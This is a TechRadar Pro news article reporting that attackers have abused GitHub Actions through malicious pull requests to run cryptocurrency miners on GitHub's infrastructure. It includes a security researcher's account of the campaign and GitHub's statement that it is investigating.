Github may have been infiltrated to run cryptominers

Attacks can be traced back to November 2020

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

Security researchers have uncovered a massivecryptocurrencymining operation that abuses GitHub’s automated controls. According to reports, the popularopen sourcecode repository is “actively investigating” the reported incidents.

The attacks are reportedly targeted at GitHub repositories that have enabled a feature known as GitHub Actions. The feature is designed to automate the usual tasks that exist in all developer workflows.

Speaking toThe Record, Dutch security engineer Justin Perdok said the attackers are specifically looking for projects that test incoming pull requests via automated jobs to inject crypto mining software into GitHub’scloud infrastructure.

Automated abuse

Automated abuse

According to Perdok the attacks can be traced back to at least November 2020, when they were first reported by a French developer.

Breaking down the attack, Perdok says the threat actors first fork a software repository and add malicious GitHub Actions to the original code. They then file a legitimate pull request asking to merge their changes to the master repository.

Thanks to the automated processes, as soon as the pull request is filed GitHub will read the malicious GitHub Actions code and spins up avirtual machine, which then downloads and runs cryptocurrency-mining software on GitHub’s infrastructure.

Perdok believes the attacks are happening at scale and has identified at least one account that’s actively creating hundreds of pull requests containing malicious code.

Are you a pro? Subscribe to our newsletter

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

In an email toThe Record, GitHub acknowledged the attack saying they are “aware of this activity and are actively investigating”. Reportedly, they said as much to the French developer last year, before deleting the pull requests from the offending account.

We hope that GitHub’s response this time is a bit more concrete and permanent instead of just zapping the malicious pull requests.

Via:The Record

With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’sTechRadar Pro’sexpert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.

Best secure file transfer solution of 2024

Best lightweight Linux distro of 2024

ChatGPT just got easier to find when you’re searching for something